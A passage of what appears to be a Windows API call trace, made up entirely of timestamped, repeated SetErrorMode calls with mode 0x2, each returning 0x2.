SetErrorMode (uMode=0x2) returned 0x2 [0188.462] SetErrorMode (uMode=0x2) returned 0x2 [0188.472] SetErrorMode (uMode=0x2) returned 0x2 [0188.476] SetErrorMode (uMode=0x2) returned 0x2 [0188.481] SetErrorMode (uMode=0x2) returned 0x2 [0188.489] SetErrorMode (uMode=0x2) returned 0x2 [0188.493] SetErrorMode (uMode=0x2) returned 0x2 [0188.499] SetErrorMode (uMode=0x2) returned 0x2 [0188.503] SetErrorMode (uMode=0x2) returned 0x2 [0188.510] SetErrorMode (uMode=0x2) returned 0x2 [0188.515] SetErrorMode (uMode=0x2) returned 0x2 [0188.527] SetErrorMode (uMode=0x2) returned 0x2 [0188.533] SetErrorMode (uMode=0x2) returned 0x2 [0188.541] SetErrorMode (uMode=0x2) returned 0x2 [0188.546] SetErrorMode (uMode=0x2) returned 0x2 [0188.553] SetErrorMode (uMode=0x2) returned 0x2 [0188.559] SetErrorMode (uMode=0x2) returned 0x2 [0188.564] SetErrorMode (uMode=0x2) returned 0x2 [0188.570] SetErrorMode (uMode=0x2) returned 0x2 [0188.576] SetErrorMode (uMode=0x2) returned 0x2 [0188.582] SetErrorMode (uMode=0x2) returned 0x2 [0188.596] SetErrorMode (uMode=0x2) returned 0x2 [0188.601] SetErrorMode (uMode=0x2) returned 0x2 [0188.608] SetErrorMode (uMode=0x2) returned 0x2 [0188.614] SetErrorMode (uMode=0x2) returned 0x2 [0188.621] SetErrorMode (uMode=0x2) returned 0x2 [0188.626] SetErrorMode (uMode=0x2) returned 0x2 [0188.632] SetErrorMode (uMode=0x2) returned 0x2 [0188.637] SetErrorMode (uMode=0x2) returned 0x2 [0188.644] SetErrorMode (uMode=0x2) returned 0x2 [0188.652] SetErrorMode (uMode=0x2) returned 0x2 [0188.660] SetErrorMode (uMode=0x2) returned 0x2 [0188.666] SetErrorMode (uMode=0x2) returned 0x2 [0188.671] SetErrorMode (uMode=0x2) returned 0x2 [0188.676] SetErrorMode (uMode=0x2) returned 0x2 [0188.683] SetErrorMode (uMode=0x2) returned 0x2 [0188.693] SetErrorMode (uMode=0x2) returned 0x2 [0188.700] SetErrorMode (uMode=0x2) returned 0x2 [0188.706] SetErrorMode (uMode=0x2) returned 0x2 [0188.711] SetErrorMode (uMode=0x2) returned 0x2 [0188.720] SetErrorMode (uMode=0x2) returned 0x2 [0188.727] SetErrorMode (uMode=0x2) returned 0x2 [0188.733] SetErrorMode (uMode=0x2) returned 0x2 [0188.739] SetErrorMode (uMode=0x2) returned 0x2 [0188.744] SetErrorMode (uMode=0x2) returned 0x2 [0188.750] SetErrorMode (uMode=0x2) returned 0x2 [0188.755] SetErrorMode (uMode=0x2) returned 0x2 [0188.760] SetErrorMode (uMode=0x2) returned 0x2 [0188.768] SetErrorMode (uMode=0x2) returned 0x2 [0188.774] SetErrorMode (uMode=0x2) returned 0x2 [0188.785] SetErrorMode (uMode=0x2) returned 0x2 [0188.794] SetErrorMode (uMode=0x2) returned 0x2 [0188.801] SetErrorMode (uMode=0x2) returned 0x2 [0188.810] SetErrorMode (uMode=0x2) returned 0x2 [0188.816] SetErrorMode (uMode=0x2) returned 0x2 [0188.822] SetErrorMode (uMode=0x2) returned 0x2 [0188.829] SetErrorMode (uMode=0x2) returned 0x2 [0188.837] SetErrorMode (uMode=0x2) returned 0x2 [0188.843] SetErrorMode (uMode=0x2) returned 0x2 [0188.856] SetErrorMode (uMode=0x2) returned 0x2 [0188.863] SetErrorMode (uMode=0x2) returned 0x2 [0188.870] SetErrorMode (uMode=0x2) returned 0x2 [0188.875] SetErrorMode (uMode=0x2) returned 0x2 [0188.883] SetErrorMode (uMode=0x2) returned 0x2 [0188.891] SetErrorMode (uMode=0x2) returned 0x2 [0188.897] SetErrorMode (uMode=0x2) returned 0x2 [0188.904] SetErrorMode (uMode=0x2) returned 0x2 [0188.909] SetErrorMode (uMode=0x2) returned 0x2 [0188.918] SetErrorMode (uMode=0x2) returned 0x2 [0188.924] SetErrorMode (uMode=0x2) returned 0x2 [0188.931] SetErrorMode (uMode=0x2) returned 0x2 [0188.939] SetErrorMode (uMode=0x2) returned 0x2 [0188.946] SetErrorMode (uMode=0x2) returned 0x2 [0188.952] SetErrorMode (uMode=0x2) returned 0x2 [0188.960] SetErrorMode (uMode=0x2) returned 0x2 [0188.975] SetErrorMode (uMode=0x2) returned 0x2 [0188.986] SetErrorMode (uMode=0x2) returned 0x2 [0188.994] SetErrorMode (uMode=0x2) returned 0x2 [0189.000] SetErrorMode (uMode=0x2) returned 0x2 [0189.007] SetErrorMode (uMode=0x2) returned 0x2 [0189.015] SetErrorMode (uMode=0x2) returned 0x2 [0189.022] SetErrorMode (uMode=0x2) returned 0x2 [0189.029] SetErrorMode (uMode=0x2) returned 0x2 [0189.037] SetErrorMode (uMode=0x2) returned 0x2 [0189.047] SetErrorMode (uMode=0x2) returned 0x2 [0189.057] SetErrorMode (uMode=0x2) returned 0x2 [0189.064] SetErrorMode (uMode=0x2) returned 0x2 [0189.071] SetErrorMode (uMode=0x2) returned 0x2 [0189.078] SetErrorMode (uMode=0x2) returned 0x2 [0189.084] SetErrorMode (uMode=0x2) returned 0x2 [0189.090] SetErrorMode (uMode=0x2) returned 0x2 [0189.116] SetErrorMode (uMode=0x2) returned 0x2 [0189.121] SetErrorMode (uMode=0x2) returned 0x2 [0189.127] SetErrorMode (uMode=0x2) returned 0x2 [0189.134] SetErrorMode (uMode=0x2) returned 0x2 [0189.139] SetErrorMode (uMode=0x2) returned 0x2 [0189.145] SetErrorMode (uMode=0x2) returned 0x2 [0189.150] SetErrorMode (uMode=0x2) returned 0x2 [0189.155] SetErrorMode (uMode=0x2) returned 0x2 [0189.162] SetErrorMode (uMode=0x2) returned 0x2 [0189.169] SetErrorMode (uMode=0x2) returned 0x2 [0189.177] SetErrorMode (uMode=0x2) returned 0x2 [0189.182] SetErrorMode (uMode=0x2) returned 0x2 [0189.188] SetErrorMode (uMode=0x2) returned 0x2 [0189.194] SetErrorMode (uMode=0x2) returned 0x2 [0189.199] SetErrorMode (uMode=0x2) returned 0x2 [0189.204] SetErrorMode (uMode=0x2) returned 0x2 [0189.213] SetErrorMode (uMode=0x2) returned 0x2 [0189.219] SetErrorMode (uMode=0x2) returned 0x2 [0189.224] SetErrorMode (uMode=0x2) returned 0x2 [0189.229] SetErrorMode (uMode=0x2) returned 0x2 [0189.235] SetErrorMode (uMode=0x2) returned 0x2 [0189.244] SetErrorMode (uMode=0x2) returned 0x2 [0189.250] SetErrorMode (uMode=0x2) returned 0x2 [0189.256] SetErrorMode (uMode=0x2) returned 0x2 [0189.264] SetErrorMode (uMode=0x2) returned 0x2 [0189.269] SetErrorMode (uMode=0x2) returned 0x2 [0189.274] SetErrorMode (uMode=0x2) returned 0x2 [0189.279] SetErrorMode (uMode=0x2) returned 0x2 [0189.285] SetErrorMode (uMode=0x2) returned 0x2 [0189.290] SetErrorMode (uMode=0x2) returned 0x2 [0189.297] SetErrorMode (uMode=0x2) returned 0x2 [0189.311] SetErrorMode (uMode=0x2) returned 0x2 [0189.317] SetErrorMode (uMode=0x2) returned 0x2 [0189.323] SetErrorMode (uMode=0x2) returned 0x2 [0189.329] SetErrorMode (uMode=0x2) returned 0x2 [0189.336] SetErrorMode (uMode=0x2) returned 0x2 [0189.342] SetErrorMode (uMode=0x2) returned 0x2 [0189.348] SetErrorMode (uMode=0x2) returned 0x2 [0189.353] SetErrorMode (uMode=0x2) returned 0x2 [0189.358] SetErrorMode (uMode=0x2) returned 0x2 [0189.363] SetErrorMode (uMode=0x2) returned 0x2 [0189.372] SetErrorMode (uMode=0x2) returned 0x2 [0189.377] SetErrorMode (uMode=0x2) returned 0x2 [0189.383] SetErrorMode (uMode=0x2) returned 0x2 [0189.389] SetErrorMode (uMode=0x2) returned 0x2 [0189.394] SetErrorMode (uMode=0x2) returned 0x2 [0189.400] SetErrorMode (uMode=0x2) returned 0x2 [0189.405] SetErrorMode (uMode=0x2) returned 0x2 [0189.411] SetErrorMode (uMode=0x2) returned 0x2 [0189.416] SetErrorMode (uMode=0x2) returned 0x2 [0189.423] SetErrorMode (uMode=0x2) returned 0x2 [0189.428] SetErrorMode (uMode=0x2) returned 0x2 [0189.441] SetErrorMode (uMode=0x2) returned 0x2 [0189.447] SetErrorMode (uMode=0x2) returned 0x2 [0189.462] SetErrorMode (uMode=0x2) returned 0x2 [0189.469] SetErrorMode (uMode=0x2) returned 0x2 [0189.495] SetErrorMode (uMode=0x2) returned 0x2 [0189.506] SetErrorMode (uMode=0x2) returned 0x2 [0189.584] SetErrorMode (uMode=0x2) returned 0x2 [0189.590] SetErrorMode (uMode=0x2) returned 0x2 [0189.596] SetErrorMode (uMode=0x2) returned 0x2 [0189.602] SetErrorMode (uMode=0x2) returned 0x2 [0189.607] SetErrorMode (uMode=0x2) returned 0x2 [0189.614] SetErrorMode (uMode=0x2) returned 0x2 [0189.620] SetErrorMode (uMode=0x2) returned 0x2 [0189.636] SetErrorMode (uMode=0x2) returned 0x2 [0189.641] SetErrorMode (uMode=0x2) returned 0x2 [0189.648] SetErrorMode (uMode=0x2) returned 0x2 [0189.655] SetErrorMode (uMode=0x2) returned 0x2 [0189.661] SetErrorMode (uMode=0x2) returned 0x2 [0189.669] SetErrorMode (uMode=0x2) returned 0x2 [0189.676] SetErrorMode (uMode=0x2) returned 0x2 [0189.681] SetErrorMode (uMode=0x2) returned 0x2 [0189.687] SetErrorMode (uMode=0x2) returned 0x2 [0189.692] SetErrorMode (uMode=0x2) returned 0x2 [0189.701] SetErrorMode (uMode=0x2) returned 0x2 [0189.709] SetErrorMode (uMode=0x2) returned 0x2 [0189.714] SetErrorMode (uMode=0x2) returned 0x2 [0189.721] SetErrorMode (uMode=0x2) returned 0x2 [0189.726] SetErrorMode (uMode=0x2) returned 0x2 [0189.732] SetErrorMode (uMode=0x2) returned 0x2 [0189.739] SetErrorMode (uMode=0x2) returned 0x2 [0189.744] SetErrorMode (uMode=0x2) returned 0x2 [0189.754] SetErrorMode (uMode=0x2) returned 0x2 [0189.763] SetErrorMode (uMode=0x2) returned 0x2 [0189.769] SetErrorMode (uMode=0x2) returned 0x2 [0189.775] SetErrorMode (uMode=0x2) returned 0x2 [0189.781] SetErrorMode (uMode=0x2) returned 0x2 [0189.790] SetErrorMode (uMode=0x2) returned 0x2 [0189.795] SetErrorMode (uMode=0x2) returned 0x2 [0189.801] SetErrorMode (uMode=0x2) returned 0x2 [0189.808] SetErrorMode (uMode=0x2) returned 0x2 [0189.813] SetErrorMode (uMode=0x2) returned 0x2 [0189.818] SetErrorMode (uMode=0x2) returned 0x2 [0189.830] SetErrorMode (uMode=0x2) returned 0x2 [0189.836] SetErrorMode (uMode=0x2) returned 0x2 [0189.841] SetErrorMode (uMode=0x2) returned 0x2 [0189.847] SetErrorMode (uMode=0x2) returned 0x2 [0189.853] SetErrorMode (uMode=0x2) returned 0x2 [0189.860] SetErrorMode (uMode=0x2) returned 0x2 [0189.865] SetErrorMode (uMode=0x2) returned 0x2 [0189.873] SetErrorMode (uMode=0x2) returned 0x2 [0189.878] SetErrorMode (uMode=0x2) returned 0x2 [0189.884] SetErrorMode (uMode=0x2) returned 0x2 [0189.892] SetErrorMode (uMode=0x2) returned 0x2 [0189.897] SetErrorMode (uMode=0x2) returned 0x2 [0189.904] SetErrorMode (uMode=0x2) returned 0x2 [0189.912] SetErrorMode (uMode=0x2) returned 0x2 [0189.918] SetErrorMode (uMode=0x2) returned 0x2 [0189.926] SetErrorMode (uMode=0x2) returned 0x2 [0189.933] SetErrorMode (uMode=0x2) returned 0x2 [0189.940] SetErrorMode (uMode=0x2) returned 0x2 [0189.948] SetErrorMode (uMode=0x2) returned 0x2 [0189.953] SetErrorMode (uMode=0x2) returned 0x2 [0189.962] SetErrorMode (uMode=0x2) returned 0x2 [0189.969] SetErrorMode (uMode=0x2) returned 0x2 [0189.974] SetErrorMode (uMode=0x2) returned 0x2 [0189.980] SetErrorMode (uMode=0x2) returned 0x2 [0189.985] SetErrorMode (uMode=0x2) returned 0x2 [0189.991] SetErrorMode (uMode=0x2) returned 0x2 [0189.997] SetErrorMode (uMode=0x2) returned 0x2 [0190.002] SetErrorMode (uMode=0x2) returned 0x2 [0190.008] SetErrorMode (uMode=0x2) returned 0x2 [0190.017] SetErrorMode (uMode=0x2) returned 0x2 [0190.033] SetErrorMode (uMode=0x2) returned 0x2 [0190.038] SetErrorMode (uMode=0x2) returned 0x2 [0190.044] SetErrorMode (uMode=0x2) returned 0x2 [0190.049] SetErrorMode (uMode=0x2) returned 0x2 [0190.054] SetErrorMode (uMode=0x2) returned 0x2 [0190.063] SetErrorMode (uMode=0x2) returned 0x2 [0190.069] SetErrorMode (uMode=0x2) returned 0x2 [0190.075] SetErrorMode (uMode=0x2) returned 0x2 [0190.080] SetErrorMode (uMode=0x2) returned 0x2 [0190.089] SetErrorMode (uMode=0x2) returned 0x2 [0190.094] SetErrorMode (uMode=0x2) returned 0x2 [0190.122] SetErrorMode (uMode=0x2) returned 0x2 [0190.127] SetErrorMode (uMode=0x2) returned 0x2 [0190.132] SetErrorMode (uMode=0x2) returned 0x2 [0190.137] SetErrorMode (uMode=0x2) returned 0x2 [0190.143] SetErrorMode (uMode=0x2) returned 0x2 [0190.148] SetErrorMode (uMode=0x2) returned 0x2 [0190.160] SetErrorMode (uMode=0x2) returned 0x2 [0190.166] SetErrorMode (uMode=0x2) returned 0x2 [0190.171] SetErrorMode (uMode=0x2) returned 0x2 [0190.177] SetErrorMode (uMode=0x2) returned 0x2 [0190.183] SetErrorMode (uMode=0x2) returned 0x2 [0190.188] SetErrorMode (uMode=0x2) returned 0x2 [0190.195] SetErrorMode (uMode=0x2) returned 0x2 [0190.200] SetErrorMode (uMode=0x2) returned 0x2 [0190.205] SetErrorMode (uMode=0x2) returned 0x2 [0190.210] SetErrorMode (uMode=0x2) returned 0x2 [0190.218] SetErrorMode (uMode=0x2) returned 0x2 [0190.225] SetErrorMode (uMode=0x2) returned 0x2 [0190.231] SetErrorMode (uMode=0x2) returned 0x2 [0190.236] SetErrorMode (uMode=0x2) returned 0x2 [0190.241] SetErrorMode (uMode=0x2) returned 0x2 [0190.246] SetErrorMode (uMode=0x2) returned 0x2 [0190.251] SetErrorMode (uMode=0x2) returned 0x2 [0190.256] SetErrorMode (uMode=0x2) returned 0x2 [0190.261] SetErrorMode (uMode=0x2) returned 0x2 [0190.268] SetErrorMode (uMode=0x2) returned 0x2 [0190.274] SetErrorMode (uMode=0x2) returned 0x2 [0190.279] SetErrorMode (uMode=0x2) returned 0x2 [0190.288] SetErrorMode (uMode=0x2) returned 0x2 [0190.293] SetErrorMode (uMode=0x2) returned 0x2 [0190.298] SetErrorMode (uMode=0x2) returned 0x2 [0190.304] SetErrorMode (uMode=0x2) returned 0x2 [0190.309] SetErrorMode (uMode=0x2) returned 0x2 [0190.315] SetErrorMode (uMode=0x2) returned 0x2 [0190.320] SetErrorMode (uMode=0x2) returned 0x2 [0190.326] SetErrorMode (uMode=0x2) returned 0x2 [0190.331] SetErrorMode (uMode=0x2) returned 0x2 [0190.337] SetErrorMode (uMode=0x2) returned 0x2 [0190.342] SetErrorMode (uMode=0x2) returned 0x2 [0190.352] SetErrorMode (uMode=0x2) returned 0x2 [0190.357] SetErrorMode (uMode=0x2) returned 0x2 [0190.364] SetErrorMode (uMode=0x2) returned 0x2 [0190.369] SetErrorMode (uMode=0x2) returned 0x2 [0190.374] SetErrorMode (uMode=0x2) returned 0x2 [0190.383] SetErrorMode (uMode=0x2) returned 0x2 [0190.388] SetErrorMode (uMode=0x2) returned 0x2 [0190.394] SetErrorMode (uMode=0x2) returned 0x2 [0190.400] SetErrorMode (uMode=0x2) returned 0x2 [0190.406] SetErrorMode (uMode=0x2) returned 0x2 [0190.417] SetErrorMode (uMode=0x2) returned 0x2 [0190.428] SetErrorMode (uMode=0x2) returned 0x2 [0190.434] SetErrorMode (uMode=0x2) returned 0x2 [0190.441] SetErrorMode (uMode=0x2) returned 0x2 [0190.457] SetErrorMode (uMode=0x2) returned 0x2 [0190.552] SetErrorMode (uMode=0x2) returned 0x2 [0190.559] SetErrorMode (uMode=0x2) returned 0x2 [0190.565] SetErrorMode (uMode=0x2) returned 0x2 [0190.572] SetErrorMode (uMode=0x2) returned 0x2 [0190.578] SetErrorMode (uMode=0x2) returned 0x2 [0190.590] SetErrorMode (uMode=0x2) returned 0x2 [0190.596] SetErrorMode (uMode=0x2) returned 0x2 [0190.603] SetErrorMode (uMode=0x2) returned 0x2 [0190.618] SetErrorMode (uMode=0x2) returned 0x2 [0190.627] SetErrorMode (uMode=0x2) returned 0x2 [0190.668] SetErrorMode (uMode=0x2) returned 0x2 [0190.675] SetErrorMode (uMode=0x2) returned 0x2 [0190.681] SetErrorMode (uMode=0x2) returned 0x2 [0190.689] SetErrorMode (uMode=0x2) returned 0x2 [0190.696] SetErrorMode (uMode=0x2) returned 0x2 [0190.729] SetErrorMode (uMode=0x2) returned 0x2 [0190.736] SetErrorMode (uMode=0x2) returned 0x2 [0190.742] SetErrorMode (uMode=0x2) returned 0x2 [0190.747] SetErrorMode (uMode=0x2) returned 0x2 [0190.754] SetErrorMode (uMode=0x2) returned 0x2 [0190.782] SetErrorMode (uMode=0x2) returned 0x2 [0190.791] SetErrorMode (uMode=0x2) returned 0x2 [0190.798] SetErrorMode (uMode=0x2) returned 0x2 [0190.806] SetErrorMode (uMode=0x2) returned 0x2 [0190.813] SetErrorMode (uMode=0x2) returned 0x2 [0190.824] SetErrorMode (uMode=0x2) returned 0x2 [0190.842] SetErrorMode (uMode=0x2) returned 0x2 [0190.853] SetErrorMode (uMode=0x2) returned 0x2 [0190.872] SetErrorMode (uMode=0x2) returned 0x2 [0190.889] SetErrorMode (uMode=0x2) returned 0x2 [0190.926] SetErrorMode (uMode=0x2) returned 0x2 [0190.935] SetErrorMode (uMode=0x2) returned 0x2 [0190.941] SetErrorMode (uMode=0x2) returned 0x2 [0190.946] SetErrorMode (uMode=0x2) returned 0x2 [0190.953] SetErrorMode (uMode=0x2) returned 0x2 [0190.959] SetErrorMode (uMode=0x2) returned 0x2 [0190.984] SetErrorMode (uMode=0x2) returned 0x2 [0190.990] SetErrorMode (uMode=0x2) returned 0x2 [0190.996] SetErrorMode (uMode=0x2) returned 0x2 [0191.036] SetErrorMode (uMode=0x2) returned 0x2 [0191.043] SetErrorMode (uMode=0x2) returned 0x2 [0191.049] SetErrorMode (uMode=0x2) returned 0x2 [0191.054] SetErrorMode (uMode=0x2) returned 0x2 [0191.060] SetErrorMode (uMode=0x2) returned 0x2 [0191.179] SetErrorMode (uMode=0x2) returned 0x2 [0191.186] SetErrorMode (uMode=0x2) returned 0x2 [0191.194] SetErrorMode (uMode=0x2) returned 0x2 [0191.203] SetErrorMode (uMode=0x2) returned 0x2 [0191.210] SetErrorMode (uMode=0x2) returned 0x2 [0191.261] SetErrorMode (uMode=0x2) returned 0x2 [0191.269] SetErrorMode (uMode=0x2) returned 0x2 [0191.274] SetErrorMode (uMode=0x2) returned 0x2 [0191.280] SetErrorMode (uMode=0x2) returned 0x2 [0191.286] SetErrorMode (uMode=0x2) returned 0x2 [0191.292] SetErrorMode (uMode=0x2) returned 0x2 [0191.312] SetErrorMode (uMode=0x2) returned 0x2 [0191.318] SetErrorMode (uMode=0x2) returned 0x2 [0191.324] SetErrorMode (uMode=0x2) returned 0x2 [0191.329] SetErrorMode (uMode=0x2) returned 0x2 [0191.334] SetErrorMode (uMode=0x2) returned 0x2 [0191.343] SetErrorMode (uMode=0x2) returned 0x2 [0191.356] SetErrorMode (uMode=0x2) returned 0x2 [0191.363] SetErrorMode (uMode=0x2) returned 0x2 [0191.370] SetErrorMode (uMode=0x2) returned 0x2 [0191.378] SetErrorMode (uMode=0x2) returned 0x2 [0191.383] SetErrorMode (uMode=0x2) returned 0x2 [0191.388] SetErrorMode (uMode=0x2) returned 0x2 [0191.395] SetErrorMode (uMode=0x2) returned 0x2 [0191.400] SetErrorMode (uMode=0x2) returned 0x2 [0191.405] SetErrorMode (uMode=0x2) returned 0x2 [0191.410] SetErrorMode (uMode=0x2) returned 0x2 [0191.418] SetErrorMode (uMode=0x2) returned 0x2 [0191.423] SetErrorMode (uMode=0x2) returned 0x2 [0191.430] SetErrorMode (uMode=0x2) returned 0x2 [0191.436] SetErrorMode (uMode=0x2) returned 0x2 [0191.444] SetErrorMode (uMode=0x2) returned 0x2 [0191.461] SetErrorMode (uMode=0x2) returned 0x2 [0191.466] SetErrorMode (uMode=0x2) returned 0x2 [0191.474] SetErrorMode (uMode=0x2) returned 0x2 [0191.481] SetErrorMode (uMode=0x2) returned 0x2 [0191.486] SetErrorMode (uMode=0x2) returned 0x2 [0191.491] SetErrorMode (uMode=0x2) returned 0x2 [0191.498] SetErrorMode (uMode=0x2) returned 0x2 [0191.504] SetErrorMode (uMode=0x2) returned 0x2 [0191.515] SetErrorMode (uMode=0x2) returned 0x2 [0191.520] SetErrorMode (uMode=0x2) returned 0x2 [0191.526] SetErrorMode (uMode=0x2) returned 0x2 [0191.532] SetErrorMode (uMode=0x2) returned 0x2 [0191.545] SetErrorMode (uMode=0x2) returned 0x2 [0191.550] SetErrorMode (uMode=0x2) returned 0x2 [0191.561] SetErrorMode (uMode=0x2) returned 0x2 [0191.567] SetErrorMode (uMode=0x2) returned 0x2 [0191.572] SetErrorMode (uMode=0x2) returned 0x2 [0191.577] SetErrorMode (uMode=0x2) returned 0x2 [0191.585] SetErrorMode (uMode=0x2) returned 0x2 [0191.591] SetErrorMode (uMode=0x2) returned 0x2 [0191.600] SetErrorMode (uMode=0x2) returned 0x2 [0191.607] SetErrorMode (uMode=0x2) returned 0x2 [0191.615] SetErrorMode (uMode=0x2) returned 0x2 [0191.625] SetErrorMode (uMode=0x2) returned 0x2 [0191.632] SetErrorMode (uMode=0x2) returned 0x2 [0191.641] SetErrorMode (uMode=0x2) returned 0x2 [0191.650] SetErrorMode (uMode=0x2) returned 0x2 [0191.656] SetErrorMode (uMode=0x2) returned 0x2 [0191.661] SetErrorMode (uMode=0x2) returned 0x2 [0191.667] SetErrorMode (uMode=0x2) returned 0x2 [0191.672] SetErrorMode (uMode=0x2) returned 0x2 [0191.678] SetErrorMode (uMode=0x2) returned 0x2 [0191.743] SetErrorMode (uMode=0x2) returned 0x2 [0191.766] SetErrorMode (uMode=0x2) returned 0x2 [0191.772] SetErrorMode (uMode=0x2) returned 0x2 [0191.779] SetErrorMode (uMode=0x2) returned 0x2 [0191.786] SetErrorMode (uMode=0x2) returned 0x2 [0191.799] SetErrorMode (uMode=0x2) returned 0x2 [0191.806] SetErrorMode (uMode=0x2) returned 0x2 [0191.813] SetErrorMode (uMode=0x2) returned 0x2 [0191.820] SetErrorMode (uMode=0x2) returned 0x2 [0191.826] SetErrorMode (uMode=0x2) returned 0x2 [0191.831] SetErrorMode (uMode=0x2) returned 0x2 [0191.837] SetErrorMode (uMode=0x2) returned 0x2 [0191.843] SetErrorMode (uMode=0x2) returned 0x2 [0191.849] SetErrorMode (uMode=0x2) returned 0x2 [0191.855] SetErrorMode (uMode=0x2) returned 0x2 [0191.860] SetErrorMode (uMode=0x2) returned 0x2 [0191.865] SetErrorMode (uMode=0x2) returned 0x2 [0191.871] SetErrorMode (uMode=0x2) returned 0x2 [0191.876] SetErrorMode (uMode=0x2) returned 0x2 [0191.882] SetErrorMode (uMode=0x2) returned 0x2 [0191.887] SetErrorMode (uMode=0x2) returned 0x2 [0191.892] SetErrorMode (uMode=0x2) returned 0x2 [0191.897] SetErrorMode (uMode=0x2) returned 0x2 [0191.903] SetErrorMode (uMode=0x2) returned 0x2 [0191.917] SetErrorMode (uMode=0x2) returned 0x2 [0191.922] SetErrorMode (uMode=0x2) returned 0x2 [0191.927] SetErrorMode (uMode=0x2) returned 0x2 [0191.933] SetErrorMode (uMode=0x2) returned 0x2 [0191.938] SetErrorMode (uMode=0x2) returned 0x2 [0191.943] SetErrorMode (uMode=0x2) returned 0x2 [0191.948] SetErrorMode (uMode=0x2) returned 0x2 [0191.983] SetErrorMode (uMode=0x2) returned 0x2 [0191.988] SetErrorMode (uMode=0x2) returned 0x2 [0191.994] SetErrorMode (uMode=0x2) returned 0x2 [0191.999] SetErrorMode (uMode=0x2) returned 0x2 [0192.004] SetErrorMode (uMode=0x2) returned 0x2 [0192.009] SetErrorMode (uMode=0x2) returned 0x2 [0192.016] SetErrorMode (uMode=0x2) returned 0x2 [0192.022] SetErrorMode (uMode=0x2) returned 0x2 [0192.027] SetErrorMode (uMode=0x2) returned 0x2 [0192.032] SetErrorMode (uMode=0x2) returned 0x2 [0192.037] SetErrorMode (uMode=0x2) returned 0x2 [0192.043] SetErrorMode (uMode=0x2) returned 0x2 [0192.048] SetErrorMode (uMode=0x2) returned 0x2 [0192.055] SetErrorMode (uMode=0x2) returned 0x2 [0192.060] SetErrorMode (uMode=0x2) returned 0x2 [0192.065] SetErrorMode (uMode=0x2) returned 0x2 [0192.070] SetErrorMode (uMode=0x2) returned 0x2 [0192.076] SetErrorMode (uMode=0x2) returned 0x2 [0192.080] SetErrorMode (uMode=0x2) returned 0x2 [0192.086] SetErrorMode (uMode=0x2) returned 0x2 [0192.116] SetErrorMode (uMode=0x2) returned 0x2 [0192.121] SetErrorMode (uMode=0x2) returned 0x2 [0192.127] SetErrorMode (uMode=0x2) returned 0x2 [0192.132] SetErrorMode (uMode=0x2) returned 0x2 [0192.137] SetErrorMode (uMode=0x2) returned 0x2 [0192.142] SetErrorMode (uMode=0x2) returned 0x2 [0192.149] SetErrorMode (uMode=0x2) returned 0x2 [0192.156] SetErrorMode (uMode=0x2) returned 0x2 [0192.161] SetErrorMode (uMode=0x2) returned 0x2 [0192.166] SetErrorMode (uMode=0x2) returned 0x2 [0192.171] SetErrorMode (uMode=0x2) returned 0x2 [0192.181] SetErrorMode (uMode=0x2) returned 0x2 [0192.199] SetErrorMode (uMode=0x2) returned 0x2 [0192.205] SetErrorMode (uMode=0x2) returned 0x2 [0192.212] SetErrorMode (uMode=0x2) returned 0x2 [0192.219] SetErrorMode (uMode=0x2) returned 0x2 [0192.224] SetErrorMode (uMode=0x2) returned 0x2 [0192.230] SetErrorMode (uMode=0x2) returned 0x2 [0192.250] SetErrorMode (uMode=0x2) returned 0x2 [0192.255] SetErrorMode (uMode=0x2) returned 0x2 [0192.261] SetErrorMode (uMode=0x2) returned 0x2 [0192.267] SetErrorMode (uMode=0x2) returned 0x2 [0192.273] SetErrorMode (uMode=0x2) returned 0x2 [0192.279] SetErrorMode (uMode=0x2) returned 0x2 [0192.289] SetErrorMode (uMode=0x2) returned 0x2 [0192.297] SetErrorMode (uMode=0x2) returned 0x2 [0192.302] SetErrorMode (uMode=0x2) returned 0x2 [0192.307] SetErrorMode (uMode=0x2) returned 0x2 [0192.314] SetErrorMode (uMode=0x2) returned 0x2 [0192.319] SetErrorMode (uMode=0x2) returned 0x2 [0192.328] SetErrorMode (uMode=0x2) returned 0x2 [0192.334] SetErrorMode (uMode=0x2) returned 0x2 [0192.342] SetErrorMode (uMode=0x2) returned 0x2 [0192.347] SetErrorMode (uMode=0x2) returned 0x2 [0192.352] SetErrorMode (uMode=0x2) returned 0x2 [0192.359] SetErrorMode (uMode=0x2) returned 0x2 [0192.369] SetErrorMode (uMode=0x2) returned 0x2 [0192.374] SetErrorMode (uMode=0x2) returned 0x2 [0192.380] SetErrorMode (uMode=0x2) returned 0x2 [0192.385] SetErrorMode (uMode=0x2) returned 0x2 [0192.390] SetErrorMode (uMode=0x2) returned 0x2 [0192.395] SetErrorMode (uMode=0x2) returned 0x2 [0192.400] SetErrorMode (uMode=0x2) returned 0x2 [0192.408] SetErrorMode (uMode=0x2) returned 0x2 [0192.413] SetErrorMode (uMode=0x2) returned 0x2 [0192.419] SetErrorMode (uMode=0x2) returned 0x2 [0192.426] SetErrorMode (uMode=0x2) returned 0x2 [0192.432] SetErrorMode (uMode=0x2) returned 0x2 [0192.438] SetErrorMode (uMode=0x2) returned 0x2 [0192.446] SetErrorMode (uMode=0x2) returned 0x2 [0192.462] SetErrorMode (uMode=0x2) returned 0x2 [0192.468] SetErrorMode (uMode=0x2) returned 0x2 [0192.473] SetErrorMode (uMode=0x2) returned 0x2 [0192.493] SetErrorMode (uMode=0x2) returned 0x2 [0192.499] SetErrorMode (uMode=0x2) returned 0x2 [0192.507] SetErrorMode (uMode=0x2) returned 0x2 [0192.512] SetErrorMode (uMode=0x2) returned 0x2 [0192.518] SetErrorMode (uMode=0x2) returned 0x2 [0192.523] SetErrorMode (uMode=0x2) returned 0x2 [0192.528] SetErrorMode (uMode=0x2) returned 0x2 [0192.534] SetErrorMode (uMode=0x2) returned 0x2 [0192.541] SetErrorMode (uMode=0x2) returned 0x2 [0192.546] SetErrorMode (uMode=0x2) returned 0x2 [0192.552] SetErrorMode (uMode=0x2) returned 0x2 [0192.562] SetErrorMode (uMode=0x2) returned 0x2 [0192.577] SetErrorMode (uMode=0x2) returned 0x2 [0192.583] SetErrorMode (uMode=0x2) returned 0x2 [0192.588] SetErrorMode (uMode=0x2) returned 0x2 [0192.593] SetErrorMode (uMode=0x2) returned 0x2 [0192.603] SetErrorMode (uMode=0x2) returned 0x2 [0192.609] SetErrorMode (uMode=0x2) returned 0x2 [0192.614] SetErrorMode (uMode=0x2) returned 0x2 [0192.619] SetErrorMode (uMode=0x2) returned 0x2 [0192.624] SetErrorMode (uMode=0x2) returned 0x2 [0192.629] SetErrorMode (uMode=0x2) returned 0x2 [0192.634] SetErrorMode (uMode=0x2) returned 0x2 [0192.643] SetErrorMode (uMode=0x2) returned 0x2 [0192.649] SetErrorMode (uMode=0x2) returned 0x2 [0192.655] 